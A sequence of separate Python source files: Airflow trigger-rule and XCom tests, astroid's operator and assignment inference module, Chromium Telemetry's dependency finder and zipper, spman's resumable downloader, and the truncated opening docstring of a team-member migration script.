['one_failed', 2, 0, 1, 0, 2, True, None, True],
['one_failed', 2, 1, 0, 0, 3, True, None, False],
['one_failed', 2, 3, 0, 0, 5, True, ST.SKIPPED, False],
#
# Tests for done
#
['all_done', 5, 0, 0, 0, 5, True, None, True],
['all_done', 2, 0, 0, 0, 2, True, None, False],
['all_done', 2, 0, 1, 0, 3, True, None, False],
['all_done', 2, 1, 0, 0, 3, True, None, False]
])
def test_check_task_dependencies(self, trigger_rule, successes, skipped,
failed, upstream_failed, done,
flag_upstream_failed,
expect_state, expect_completed):
start_date = datetime.datetime(2016, 2, 1, 0, 0, 0)
dag = models.DAG('test-dag', start_date=start_date)
downstream = DummyOperator(task_id='downstream',
dag=dag, owner='airflow',
trigger_rule=trigger_rule)
for i in range(5):
task = DummyOperator(task_id='runme_{}'.format(i),
dag=dag, owner='airflow')
task.set_downstream(downstream)
run_date = task.start_date + datetime.timedelta(days=5)
ti = TI(downstream, run_date)
dep_results = TriggerRuleDep()._evaluate_trigger_rule(
ti=ti,
successes=successes,
skipped=skipped,
failed=failed,
upstream_failed=upstream_failed,
done=done,
flag_upstream_failed=flag_upstream_failed)
completed = all([dep.passed for dep in dep_results])
self.assertEqual(completed, expect_completed)
self.assertEqual(ti.state, expect_state)
def test_xcom_pull_after_success(self):
"""
tests xcom set/clear relative to a task in a 'success' rerun scenario
"""
key = 'xcom_key'
value = 'xcom_value'
dag = models.DAG(dag_id='test_xcom', schedule_interval='@monthly')
task = DummyOperator(
task_id='test_xcom',
dag=dag,
pool='test_xcom',
owner='airflow',
start_date=datetime.datetime(2016, 6, 2, 0, 0, 0))
exec_date = datetime.datetime.now()
ti = TI(
task=task, execution_date=exec_date)
ti.run(mark_success=True)
ti.xcom_push(key=key, value=value)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), value)
ti.run()
# The second run and assert is to handle AIRFLOW-131 (don't clear on
# prior success)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), value)
# Test AIRFLOW-703: Xcom shouldn't be cleared if the task doesn't
# execute, even if dependencies are ignored
ti.run(ignore_all_deps=True, mark_success=True)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), value)
# Xcom IS finally cleared once task has executed
ti.run(ignore_all_deps=True)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), None)
def test_xcom_pull_different_execution_date(self):
"""
tests xcom fetch behavior with different execution dates, using
both xcom_pull with "include_prior_dates" and without
"""
key = 'xcom_key'
value = 'xcom_value'
dag = models.DAG(dag_id='test_xcom', schedule_interval='@monthly')
task = DummyOperator(
task_id='test_xcom',
dag=dag,
pool='test_xcom',
owner='airflow',
start_date=datetime.datetime(2016, 6, 2, 0, 0, 0))
exec_date = datetime.datetime.now()
ti = TI(
task=task, execution_date=exec_date)
ti.run(mark_success=True)
ti.xcom_push(key=key, value=value)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), value)
ti.run()
exec_date += datetime.timedelta(days=1)
ti = TI(
task=task, execution_date=exec_date)
ti.run()
        # We have set a new execution date (and did not pass in
        # 'include_prior_dates'), which means this task should now have a
        # cleared xcom value.
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), None)
# We *should* get a value using 'include_prior_dates'
self.assertEqual(ti.xcom_pull(task_ids='test_xcom',
key=key,
include_prior_dates=True),
value)
def test_post_execute_hook(self):
"""
Test that post_execute hook is called with the Operator's result.
The result ('error') will cause an error to be raised and trapped.
"""
class TestError(Exception):
pass
class TestOperator(PythonOperator):
def post_execute(self, context, result):
if result == 'error':
raise TestError('expected error.')
dag = models.DAG(dag_id='test_post_execute_dag')
task = TestOperator(
task_id='test_operator',
dag=dag,
python_callable=lambda: 'error',
owner='airflow',
start_date=datetime.datetime(2017, 2, 1))
ti = TI(task=task, execution_date=datetime.datetime.now())
with self.assertRaises(TestError):
ti.run()
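
# Illustrative sketch (not part of the original tests): the bitshift composition
# exercised in test_bitshift_compose_operators corresponds to DAG definitions such
# as the following, where '>>'/'<<' set downstream/upstream relationships and a
# DAG on either side of the operator assigns the task to that DAG. Task ids and
# the dag id below are hypothetical.
#
#     with DAG('example_compose', start_date=DEFAULT_DATE) as example_dag:
#         extract = DummyOperator(task_id='extract')
#         transform = DummyOperator(task_id='transform')
#         load = DummyOperator(task_id='load')
#         extract >> transform >> load  # extract -> transform -> load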
|
|
# copyright 2003-2013 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This file is part of astroid.
#
# astroid is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# astroid is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with astroid. If not, see <http://www.gnu.org/licenses/>.
"""this module contains a set of functions to handle python protocols for nodes
where it makes sense.
"""
import collections
import operator
import sys
from astroid import arguments
from astroid import bases
from astroid import context as contextmod
from astroid import exceptions
from astroid import node_classes
from astroid import nodes
from astroid import util
BIN_OP_METHOD = {'+': '__add__',
'-': '__sub__',
'/': '__div__',
'//': '__floordiv__',
'*': '__mul__',
'**': '__pow__',
'%': '__mod__',
'&': '__and__',
'|': '__or__',
'^': '__xor__',
'<<': '__lshift__',
'>>': '__rshift__',
'@': '__matmul__'
}
UNARY_OP_METHOD = {'+': '__pos__',
'-': '__neg__',
'~': '__invert__',
'not': None, # XXX not '__nonzero__'
}
# unary operations ############################################################
def tl_infer_unary_op(self, operator):
if operator == 'not':
return node_classes.const_factory(not bool(self.elts))
raise TypeError() # XXX log unsupported operation
nodes.Tuple.infer_unary_op = tl_infer_unary_op
nodes.List.infer_unary_op = tl_infer_unary_op
def dict_infer_unary_op(self, operator):
if operator == 'not':
return node_classes.const_factory(not bool(self.items))
raise TypeError() # XXX log unsupported operation
nodes.Dict.infer_unary_op = dict_infer_unary_op
def const_infer_unary_op(self, operator):
if operator == 'not':
return node_classes.const_factory(not self.value)
# XXX log potentially raised TypeError
elif operator == '+':
return node_classes.const_factory(+self.value)
else: # operator == '-':
return node_classes.const_factory(-self.value)
nodes.Const.infer_unary_op = const_infer_unary_op
# binary operations ###########################################################
BIN_OP_IMPL = {'+': lambda a, b: a + b,
'-': lambda a, b: a - b,
'/': lambda a, b: a / b,
'//': lambda a, b: a // b,
'*': lambda a, b: a * b,
'**': lambda a, b: a ** b,
'%': lambda a, b: a % b,
'&': lambda a, b: a & b,
'|': lambda a, b: a | b,
'^': lambda a, b: a ^ b,
'<<': lambda a, b: a << b,
'>>': lambda a, b: a >> b,
}
if sys.version_info >= (3, 5):
# MatMult is available since Python 3.5+.
BIN_OP_IMPL['@'] = operator.matmul
for key, impl in list(BIN_OP_IMPL.items()):
BIN_OP_IMPL[key+'='] = impl
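# The loop above registers the augmented forms ('+=', '-=', '*=', ...) with the
# same implementations as their plain counterparts, so lookups in BIN_OP_IMPL
# also work for augmented operators.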
def const_infer_binary_op(self, binop, other, context):
operator = binop.op
for other in other.infer(context):
if isinstance(other, nodes.Const):
try:
impl = BIN_OP_IMPL[operator]
try:
yield node_classes.const_factory(impl(self.value, other.value))
except Exception:
# ArithmeticError is not enough: float >> float is a TypeError
# TODO : let pylint know about the problem
pass
except TypeError:
# XXX log TypeError
continue
elif other is util.YES:
yield other
else:
try:
for val in other.infer_binary_op(binop, self, context):
yield val
except AttributeError:
yield util.YES
nodes.Const.infer_binary_op = bases.yes_if_nothing_inferred(const_infer_binary_op)
def _multiply_seq_by_int(self, binop, other, context):
node = self.__class__()
node.parent = binop
elts = []
    for elt in self.elts:
        inferred = util.safe_infer(elt, context)
        if inferred is None:
            inferred = util.YES
        elts.append(inferred)
node.elts = elts * other.value
return node
def _filter_uninferable_nodes(elts, context):
for elt in elts:
if elt is util.YES:
yield elt
else:
for inferred in elt.infer(context):
yield inferred
def tl_infer_binary_op(self, binop, other, context):
operator = binop.op
for other in other.infer(context):
if isinstance(other, self.__class__) and operator == '+':
node = self.__class__()
node.parent = binop
elts = list(_filter_uninferable_nodes(self.elts, context))
elts += list(_filter_uninferable_nodes(other.elts, context))
node.elts = elts
yield node
elif isinstance(other, nodes.Const) and operator == '*':
if not isinstance(other.value, int):
yield util.YES
continue
yield _multiply_seq_by_int(self, binop, other, context)
elif isinstance(other, bases.Instance) and not isinstance(other, nodes.Const):
yield util.YES
# XXX else log TypeError
nodes.Tuple.infer_binary_op = bases.yes_if_nothing_inferred(tl_infer_binary_op)
nodes.List.infer_binary_op = bases.yes_if_nothing_inferred(tl_infer_binary_op)
def dict_infer_binary_op(self, binop, other, context):
for other in other.infer(context):
if isinstance(other, bases.Instance) and isinstance(other._proxied, nodes.ClassDef):
yield util.YES
# XXX else log TypeError
nodes.Dict.infer_binary_op = bases.yes_if_nothing_inferred(dict_infer_binary_op)
def instance_infer_binary_op(self, binop, other, context):
operator = binop.op
try:
methods = self.getattr(BIN_OP_METHOD[operator])
except (exceptions.NotFoundError, KeyError):
# Unknown operator
yield util.YES
else:
for method in methods:
if not isinstance(method, nodes.FunctionDef):
continue
for result in method.infer_call_result(self, context):
if result is not util.YES:
yield result
            # We are interested only in the first inferred method;
            # don't go looking in the rest of the methods of the ancestors.
break
bases.Instance.infer_binary_op = bases.yes_if_nothing_inferred(instance_infer_binary_op)
# assignment ##################################################################
"""the assigned_stmts method is responsible for returning the assigned statement
(i.e. not inferred) according to the assignment type.
The `asspath` argument is used to record the lhs path of the original node.
For instance, if we want the assigned statements for 'c' in 'a, (b, c)', asspath
will be [1, 1] once we arrive at the Assign node.
The `context` argument is the current inference context which should be given
to any intermediary inference necessary.
"""
def _resolve_looppart(parts, asspath, context):
"""recursive function to resolve multiple assignments on loops"""
asspath = asspath[:]
index = asspath.pop(0)
for part in parts:
if part is util.YES:
continue
# XXX handle __iter__ and log potentially detected errors
if not hasattr(part, 'itered'):
continue
try:
itered = part.itered()
except TypeError:
continue # XXX log error
for stmt in itered:
try:
assigned = stmt.getitem(index, context)
except (AttributeError, IndexError):
continue
except TypeError: # stmt is unsubscriptable Const
continue
if not asspath:
                # we have resolved the full assignment path,
                # don't infer the last part
yield assigned
elif assigned is util.YES:
break
else:
# we are not yet on the last part of the path
# search on each possibly inferred value
try:
for inferred in _resolve_looppart(assigned.infer(context),
asspath, context):
yield inferred
except exceptions.InferenceError:
break
@bases.raise_if_nothing_inferred
def for_assigned_stmts(self, node=None, context=None, asspath=None):
if asspath is None:
for lst in self.iter.infer(context):
if isinstance(lst, (nodes.Tuple, nodes.List)):
for item in lst.elts:
yield item
else:
for inferred in _resolve_looppart(self.iter.infer(context),
asspath, context):
yield inferred
nodes.For.assigned_stmts = for_assigned_stmts
nodes.Comprehension.assigned_stmts = for_assigned_stmts
def sequence_assigned_stmts(self, node=None, context=None, asspath=None):
if asspath is None:
asspath = []
try:
index = self.elts.index(node)
except ValueError:
util.reraise(exceptions.InferenceError(
'Tried to retrieve a node {node!r} which does not exist',
node=self, assign_path=asspath, context=context))
asspath.insert(0, index)
return self.parent.assigned_stmts(node=self, context=context, asspath=asspath)
nodes.Tuple.assigned_stmts = sequence_assigned_stmts
nodes.List.assigned_stmts = sequence_assigned_stmts
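# Illustrative example (not part of the original module): for an assignment like
#     a, (b, c) = some_call()
# sequence_assigned_stmts records the index of each nested target, so resolving
# 'c' reaches the Assign node with asspath [1, 1] -- the first 1 selects the
# inner tuple '(b, c)' and the second 1 selects 'c' within it.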
def assend_assigned_stmts(self, node=None, context=None, asspath=None):
return self.parent.assigned_stmts(node=self, context=context)
nodes.AssignName.assigned_stmts = assend_assigned_stmts
nodes.AssignAttr.assigned_stmts = assend_assigned_stmts
def _arguments_infer_argname(self, name, context):
# arguments information may be missing, in which case we can't do anything
# more
if not (self.args or self.vararg or self.kwarg):
yield util.YES
return
# first argument of instance/class method
if self.args and getattr(self.args[0], 'name', None) == name:
functype = self.parent.type
if functype == 'method':
yield bases.Instance(self.parent.parent.frame())
return
if functype == 'classmethod':
yield self.parent.parent.frame()
return
if context and context.callcontext:
call_site = arguments.CallSite(context.callcontext)
for value in call_site.infer_argument(self.parent, name, context):
yield value
return
# TODO: just provide the type here, no need to have an empty Dict.
if name == self.vararg:
vararg = node_classes.const_factory(())
vararg.parent = self
yield vararg
return
if name == self.kwarg:
kwarg = node_classes.const_factory({})
kwarg.parent = self
yield kwarg
return
    # if there is a default value, yield it. And then yield YES to reflect that
    # we can't guess the given argument value.
try:
context = contextmod.copy_context(context)
for inferred in self.default_value(name).infer(context):
yield inferred
yield util.YES
except exceptions.NoDefault:
yield util.YES
def arguments_assigned_stmts(self, node=None, context=None, asspath=None):
if context.callcontext:
# reset call context/name
callcontext = context.callcontext
context = contextmod.copy_context(context)
context.callcontext = None
args = arguments.CallSite(callcontext)
return args.infer_argument(self.parent, node.name, context)
return _arguments_infer_argname(self, node.name, context)
nodes.Arguments.assigned_stmts = arguments_assigned_stmts
@bases.raise_if_nothing_inferred
def assign_assigned_stmts(self, node=None, context=None, asspath=None):
if not asspath:
yield self.value
return
for inferred in _resolve_asspart(self.value.infer(context), asspath, context):
yield inferred
nodes.Assign.assigned_stmts = assign_assigned_stmts
nodes.AugAssign.assigned_stmts = assign_assigned_stmts
def _resolve_asspart(parts, asspath, context):
"""recursive function to resolve multiple assignments"""
asspath = asspath[:]
index = asspath.pop(0)
for part in parts:
if hasattr(part, 'getitem'):
try:
assigned = part.getitem(index, context)
# XXX raise a specific exception to avoid potential hiding of
# unexpected exception ?
except (TypeError, IndexError):
return
if not asspath:
                # we have resolved the full assignment path, don't infer the
                # last part
yield assigned
elif assigned is util.YES:
return
else:
# we are not yet on the last part of the path search on each
# possibly inferred value
try:
for inferred in _resolve_asspart(assigned.infer(context),
asspath, context):
yield inferred
except exceptions.InferenceError:
return
@bases.raise_if_nothing_inferred
def excepthandler_assigned_stmts(self, node=None, context=None, asspath=None):
for assigned in node_classes.unpack_infer(self.type):
if isinstance(assigned, nodes.ClassDef):
assigned = bases.Instance(assigned)
yield assigned
nodes.ExceptHandler.assigned_stmts = bases.raise_if_nothing_inferred(excepthandler_assigned_stmts)
@bases.raise_if_nothing_inferred
def with_assigned_stmts(self, node=None, context=None, asspath=None):
if asspath is None:
for _, vars in self.items:
if vars is None:
continue
for lst in vars.infer(context):
if isinstance(lst, (nodes.Tuple, nodes.List)):
for item in lst.nodes:
yield item
nodes.With.assigned_stmts = with_assigned_stmts
@bases.yes_if_nothing_inferred
def starred_assigned_stmts(self, node=None, context=None, asspath=None):
stmt = self.statement()
if not isinstance(stmt, (nodes.Assign, nodes.For)):
raise exceptions.InferenceError()
if isinstance(stmt, nodes.Assign):
value = stmt.value
lhs = stmt.targets[0]
if sum(1 for node in lhs.nodes_of_class(nodes.Starred)) > 1:
# Too many starred arguments in the expression.
raise exceptions.InferenceError()
if context is None:
context = contextmod.InferenceContext()
try:
rhs = next(value.infer(context))
except exceptions.InferenceError:
yield util.YES
return
if rhs is util.YES or not hasattr(rhs, 'elts'):
# Not interested in inferred values without elts.
yield util.YES
return
elts = collections.deque(rhs.elts[:])
if len(lhs.elts) > len(rhs.elts):
# a, *b, c = (1, 2)
raise exceptions.InferenceError()
        # Iteratively unpack the values from the rhs of the assignment until we
        # find the starred node. What remains will be the list of values which
        # the Starred node will represent.
        # This is done in two steps: from left to right to remove anything
        # before the starred node, and from right to left to remove anything
        # after it.
for index, node in enumerate(lhs.elts):
if not isinstance(node, nodes.Starred):
elts.popleft()
continue
lhs_elts = collections.deque(reversed(lhs.elts[index:]))
for node in lhs_elts:
if not isinstance(node, nodes.Starred):
elts.pop()
continue
# We're done
packed = nodes.List()
packed.elts = elts
packed.parent = self
yield packed
break
nodes.Starred.assigned_stmts = starred_assigned_stmts
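# Illustrative example (not part of the original module): for the statement
#     a, *b, c = (1, 2, 3, 4)
# the unpacking above first drops the leading value for 'a', then drops the
# trailing value for 'c', so the Starred target 'b' is inferred as a List node
# whose elts correspond to (2, 3).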
|
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import fnmatch
import imp
import logging
import modulefinder
import optparse
import os
import sys
import zipfile
from telemetry import test
from telemetry.core import command_line
from telemetry.core import discover
from telemetry.core import util
from telemetry.page import cloud_storage
from telemetry.util import bootstrap
from telemetry.util import path_set
DEPS_FILE = 'bootstrap_deps'
def _InDirectory(subdirectory, directory):
subdirectory = os.path.realpath(subdirectory)
directory = os.path.realpath(directory)
common_prefix = os.path.commonprefix([subdirectory, directory])
return common_prefix == directory
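# Illustrative examples (not part of the original module):
#   _InDirectory('/src/telemetry/core', '/src') -> True
#   _InDirectory('/other/dir', '/src') -> False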
def FindBootstrapDependencies(base_dir):
deps_file = os.path.join(base_dir, DEPS_FILE)
if not os.path.exists(deps_file):
return []
deps_paths = bootstrap.ListAllDepsPaths(deps_file)
return set(
os.path.realpath(os.path.join(util.GetChromiumSrcDir(), os.pardir, path))
for path in deps_paths)
def FindPythonDependencies(module_path):
logging.info('Finding Python dependencies of %s' % module_path)
# Load the module to inherit its sys.path modifications.
imp.load_source(
os.path.splitext(os.path.basename(module_path))[0], module_path)
# Analyze the module for its imports.
finder = modulefinder.ModuleFinder()
finder.run_script(module_path)
# Filter for only imports in Chromium.
for module in finder.modules.itervalues():
# If it's an __init__.py, module.__path__ gives the package's folder.
module_path = module.__path__[0] if module.__path__ else module.__file__
if not module_path:
continue
module_path = os.path.realpath(module_path)
if not _InDirectory(module_path, util.GetChromiumSrcDir()):
continue
yield module_path
def FindPageSetDependencies(base_dir):
logging.info('Finding page sets in %s' % base_dir)
# Add base_dir to path so our imports relative to base_dir will work.
sys.path.append(base_dir)
tests = discover.DiscoverClasses(base_dir, base_dir, test.Test,
index_by_class_name=True)
for test_class in tests.itervalues():
test_obj = test_class()
# Ensure the test's default options are set if needed.
parser = optparse.OptionParser()
test_obj.AddCommandLineArgs(parser)
options = optparse.Values()
for k, v in parser.get_default_values().__dict__.iteritems():
options.ensure_value(k, v)
# Page set paths are relative to their runner script, not relative to us.
util.GetBaseDir = lambda: base_dir
# TODO: Loading the page set will automatically download its Cloud Storage
# deps. This is really expensive, and we don't want to do this by default.
page_set = test_obj.CreatePageSet(options)
# Add all of its serving_dirs as dependencies.
for serving_dir in page_set.serving_dirs:
yield serving_dir
for page in page_set:
if page.is_file:
yield page.serving_dir
def FindExcludedFiles(files, options):
def MatchesConditions(path, conditions):
for condition in conditions:
if condition(path):
return True
return False
# Define some filters for files.
def IsHidden(path):
for pathname_component in path.split(os.sep):
if pathname_component.startswith('.'):
return True
return False
def IsPyc(path):
return os.path.splitext(path)[1] == '.pyc'
def IsInCloudStorage(path):
return os.path.exists(path + '.sha1')
def MatchesExcludeOptions(path):
for pattern in options.exclude:
if (fnmatch.fnmatch(path, pattern) or
fnmatch.fnmatch(os.path.basename(path), pattern)):
return True
return False
# Collect filters we're going to use to exclude files.
exclude_conditions = [
IsHidden,
IsPyc,
IsInCloudStorage,
MatchesExcludeOptions,
]
# Check all the files against the filters.
for path in files:
if MatchesConditions(path, exclude_conditions):
yield path
def FindDependencies(paths, options):
# Verify arguments.
for path in paths:
if not os.path.exists(path):
raise ValueError('Path does not exist: %s' % path)
dependencies = path_set.PathSet()
# Including __init__.py will include Telemetry and its dependencies.
# If the user doesn't pass any arguments, we just have Telemetry.
dependencies |= FindPythonDependencies(os.path.realpath(
os.path.join(util.GetTelemetryDir(), 'telemetry', '__init__.py')))
dependencies |= FindBootstrapDependencies(util.GetTelemetryDir())
# Add dependencies.
for path in paths:
base_dir = os.path.dirname(os.path.realpath(path))
dependencies.add(base_dir)
dependencies |= FindBootstrapDependencies(base_dir)
dependencies |= FindPythonDependencies(path)
if options.include_page_set_data:
dependencies |= FindPageSetDependencies(base_dir)
# Remove excluded files.
dependencies -= FindExcludedFiles(set(dependencies), options)
return dependencies
def ZipDependencies(paths, dependencies, options):
base_dir = os.path.dirname(os.path.realpath(util.GetChromiumSrcDir()))
with zipfile.ZipFile(options.zip, 'w', zipfile.ZIP_DEFLATED) as zip_file:
# Add dependencies to archive.
for path in dependencies:
path_in_archive = os.path.join(
'telemetry', os.path.relpath(path, base_dir))
zip_file.write(path, path_in_archive)
# Add symlinks to executable paths, for ease of use.
for path in paths:
link_info = zipfile.ZipInfo(
os.path.join('telemetry', os.path.basename(path)))
link_info.create_system = 3 # Unix attributes.
      # 0100000 marks a regular file; 0777 is the permission bits rwxrwxrwx.
link_info.external_attr = 0100777 << 16 # Octal.
relative_path = os.path.relpath(path, base_dir)
link_script = (
'#!/usr/bin/env python\n\n'
'import os\n'
'import sys\n\n\n'
'script = os.path.join(os.path.dirname(__file__), \'%s\')\n'
'os.execv(sys.executable, [sys.executable, script] + sys.argv[1:])'
% relative_path)
zip_file.writestr(link_info, link_script)
# Add gsutil to the archive, if it's available. The gsutil in
# depot_tools is modified to allow authentication using prodaccess.
# TODO: If there's a gsutil in telemetry/third_party/, bootstrap_deps
# will include it. Then there will be two copies of gsutil at the same
# location in the archive. This can be confusing for users.
gsutil_path = os.path.realpath(cloud_storage.FindGsutil())
if cloud_storage.SupportsProdaccess(gsutil_path):
gsutil_base_dir = os.path.join(os.path.dirname(gsutil_path), os.pardir)
gsutil_dependencies = path_set.PathSet()
gsutil_dependencies.add(os.path.dirname(gsutil_path))
# Also add modules from depot_tools that are needed by gsutil.
gsutil_dependencies.add(os.path.join(gsutil_base_dir, 'boto'))
gsutil_dependencies.add(os.path.join(gsutil_base_dir, 'retry_decorator'))
gsutil_dependencies -= FindExcludedFiles(
set(gsutil_dependencies), options)
# Also add upload.py to the archive from depot_tools, if it is available.
# This allows us to post patches without requiring a full depot_tools
# install. There's no real point in including upload.py if we do not
# also have gsutil, which is why this is inside the gsutil block.
gsutil_dependencies.add(os.path.join(gsutil_base_dir, 'upload.py'))
for path in gsutil_dependencies:
path_in_archive = os.path.join(
'telemetry', os.path.relpath(util.GetTelemetryDir(), base_dir),
'third_party', os.path.relpath(path, gsutil_base_dir))
zip_file.write(path, path_in_archive)
class FindDependenciesCommand(command_line.OptparseCommand):
"""Prints all dependencies"""
@classmethod
def AddCommandLineArgs(cls, parser):
parser.add_option(
'-v', '--verbose', action='count', dest='verbosity',
help='Increase verbosity level (repeat as needed).')
parser.add_option(
'-p', '--include-page-set-data', action='store_true', default=False,
help='Scan tests for page set data and include them.')
parser.add_option(
'-e', '--exclude', action='append', default=[],
help='Exclude paths matching EXCLUDE. Can be used multiple times.')
parser.add_option(
'-z', '--zip',
help='Store files in a zip archive at ZIP.')
@classmethod
def ProcessCommandLineArgs(cls, parser, args):
if args.verbosity >= 2:
logging.getLogger().setLevel(logging.DEBUG)
elif args.verbosity:
logging.getLogger().setLevel(logging.INFO)
else:
logging.getLogger().setLevel(logging.WARNING)
def Run(self, args):
paths = args.positional_args
dependencies = FindDependencies(paths, args)
if args.zip:
ZipDependencies(paths, dependencies, args)
print 'Zip archive written to %s.' % args.zip
else:
print '\n'.join(sorted(dependencies))
return 0
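# Example invocation (hypothetical entry point and paths; the real name depends
# on how this command is wired into the Telemetry CLI):
#   find_dependencies --include-page-set-data --exclude='*.pyc' \
#       --zip=telemetry_deps.zip tools/perf/run_benchmark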
|
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# download.py file is part of spman
#
# spman - Slackware package manager
# Home page: https://github.com/MyRequiem/spman
#
# Copyright (c) 2018 Vladimir MyRequiem Astrakhan, Russia
# <mrvladislavovich@gmail.com>
# All rights reserved
# See LICENSE for details.
"""
Downloading file or directory
"""
from html.parser import HTMLParser
from os import makedirs, path, remove
from shutil import rmtree
from ssl import _create_unverified_context
from sys import stderr, stdout
import requests
from .maindata import MainData
from .utils import error_open_mess, get_remote_file_size, url_is_alive
try:
from tqdm import tqdm
except ImportError:
def tqdm(*args, **kwargs):
if args:
return args[0]
return kwargs.get('iterable', None)
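# Note: when tqdm is not installed, the stub above simply returns the wrapped
# iterable (or None when called with keyword arguments only), so the download
# loop below still works; the 'is_tqdm' check skips progress-bar updates.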
class ListingParser(HTMLParser):
"""
    Parses an HTML page and builds a list of links found in the directory listing.
    Links are stored in the 'links' list.
"""
def __init__(self, url: str):
HTMLParser.__init__(self)
self.__url = url
self.links = []
def handle_starttag(self, tag: str, attrs: list) -> None:
"""
HTMLParser.handle_starttag method redefinition
"""
if tag == 'a':
for key, value in attrs:
if key == 'href' and value:
value = self.resolve_link(value)
if value:
self.links.append(value)
break
def resolve_link(self, link: str) -> str:
"""
discard unnecessary links
"""
if (not link.startswith('/') and
'?' not in link and
'http://' not in link and
'https://' not in link and
'ftp://' not in link):
return '{0}{1}'.format(self.__url, link)
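# For example (hypothetical listing): feeding ListingParser('http://host/dir/')
# the markup '<a href="pkg-1.0.txz">pkg-1.0.txz</a>' appends
# 'http://host/dir/pkg-1.0.txz' to .links, while absolute, external and
# query ('?C=N;O=D') links are discarded by resolve_link().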
class Download:
"""
Downloading file or directory
"""
def __init__(self,
url: str,
dest: str,
remove_dest: bool = False,
new_file_name: str = ''):
self.meta = MainData()
self.url = url
self.dest = dest
self.downdir = False
self.remove_dest = remove_dest
self.new_file_name = new_file_name
self.links = []
self.dirs = []
self.context = _create_unverified_context()
def start(self) -> None:
"""
start
"""
print(('{0}URL verification...{1}').format(self.meta.clrs['grey'],
self.meta.clrs['reset']))
httpresponse = url_is_alive(self.url)
if not httpresponse:
error_open_mess(self.url)
return
# if content type of url == 'text/html'
# then download the entire directory, else download file
if httpresponse.info().get_content_type() == 'text/html':
self.downdir = True
# add a trailing slash to the URL if it does not exist
if not self.url.endswith('/'):
self.url = '{0}/'.format(self.url)
# add a trailing slash to the destination
# directory if it does not exist
if not self.dest.endswith('/'):
self.dest = '{0}/'.format(self.dest)
if self.downdir:
print(('{0}Creating a list of '
'links...{1}').format(self.meta.clrs['grey'],
self.meta.clrs['reset']))
self.get_links_in_remote_dir(response=httpresponse)
if self.remove_dest and path.isdir(self.dest):
rmtree(self.dest)
for link in self.links:
self.download(link)
else:
self.download(self.url)
def get_links_in_remote_dir(self,
url: str = '',
response: object = False) -> None:
"""
get links in the remote directory
"""
if not response:
response = url_is_alive(url)
if not response:
error_open_mess(url)
else:
url = self.url
if response:
# byte --> str
content = str(response.read(),
encoding=(stdout.encoding or stderr.encoding))
parser = ListingParser(url)
parser.feed(content)
response.close()
for found_link in parser.links:
if not found_link.endswith('/'):
self.links.append(found_link)
elif found_link not in self.dirs:
self.dirs.append(found_link)
if self.dirs:
self.get_links_in_remote_dir(self.dirs.pop())
def download(self, url: str) -> None:
"""
download the file
"""
response = url_is_alive(url)
if not response:
error_open_mess(url)
return
file_name = (self.new_file_name
if self.new_file_name else url.split('/')[-1])
file_size = get_remote_file_size(httpresponse=response)
if self.downdir:
local_dir = ('{0}'
'{1}').format(self.dest,
path.dirname(url.replace(self.url, '')))
if not local_dir.endswith('/'):
local_dir = '{0}/'.format(local_dir)
else:
local_dir = self.dest
local_file = '{0}{1}'.format(local_dir, file_name)
if self.remove_dest and path.isfile(local_file):
remove(local_file)
if not path.isdir(local_dir):
makedirs(local_dir)
first_byte = 0
if path.exists(local_file):
first_byte = path.getsize(local_file)
new_name = (' (renamed to: {0})'.format(self.new_file_name)
if self.new_file_name else '')
print(('{0}Downloading: {1}{2}{7}\nURL: {4}{3}{7}\nto: '
'{4}{5}{6}{7}').format(self.meta.clrs['lyellow'],
self.meta.clrs['lblue'],
path.basename(url),
url,
self.meta.clrs['grey'],
local_dir,
new_name,
self.meta.clrs['reset']))
if not file_size and path.isfile(local_file):
remove(local_file)
if file_size and first_byte >= file_size:
print(('{0}{1} {2}is already fully '
'downloaded{3}').format(self.meta.clrs['cyan'],
local_file,
self.meta.clrs['green'],
self.meta.clrs['reset']))
return
header = {'Range': 'bytes={0}-{1}'.format(first_byte, file_size)}
try:
req = requests.get(url, headers=header, stream=True, timeout=10)
except requests.exceptions.Timeout:
error_open_mess(url)
return
except requests.exceptions.RequestException:
error_open_mess(url)
return
pbar = tqdm(total=file_size,
initial=first_byte,
unit='B',
unit_scale=True,
ncols=80,
ascii=True,
leave=False)
is_tqdm = type(pbar) is tqdm
size_chunk = 4096
with open(local_file, 'ab') as dfile:
for chunk in req.iter_content(chunk_size=size_chunk):
if chunk:
dfile.write(chunk)
if is_tqdm:
pbar.update(size_chunk)
if is_tqdm:
pbar.close()
req.close()
if not dfile.closed:
dfile.close()
if not response.closed:
response.close()
print('{0}Done{1}'.format(self.meta.clrs['lgreen'],
self.meta.clrs['reset']))
|
|
import json
import requests
import pprint # Allows Pretty Print of JSON
import os # Allows for the clearing of the Terminal Window
import csv # Allows outputting to CSV file
import time, datetime
import sys
"""
********************************************************************************************************************
The intention of this script is to:
Iterate through a list of users (users.csv), removing each member from the source team (based on the API token provided in gFromTeamTOKEN) and
returning their account to being a personal individual account.
Then immediately invite the user to join the new team (based on the API token provided in gToTeamTOKEN).
NOTE:
CSV file expects email, first name, last name
One user per row
Users in target Team are invited as standard team members. These users will need to ACCEPT the invitation before joining the team.
Once they accept, they will enter the invite flow, and must select option to transfer their content to company.
If you need to promote anyone to an Administrative level, do so using the Admin web pages.
NOTES:
When you remove a team member from a team:
1. Account will be disconnected from the team and converted to an individual account
2. Member will keep unshared files and folders, and shared folders that they own
3. Member won't have access to team-owned folders that they were invited to after joining the team
4. Member will still have access to Paper docs that they own and are private. They will lose access to paper documents that were
shared with them, and also paper documents they owned and shared with others!
By default the script runs in MOCK or test mode. Edit the variable 'gMockRun' to make it run for real.
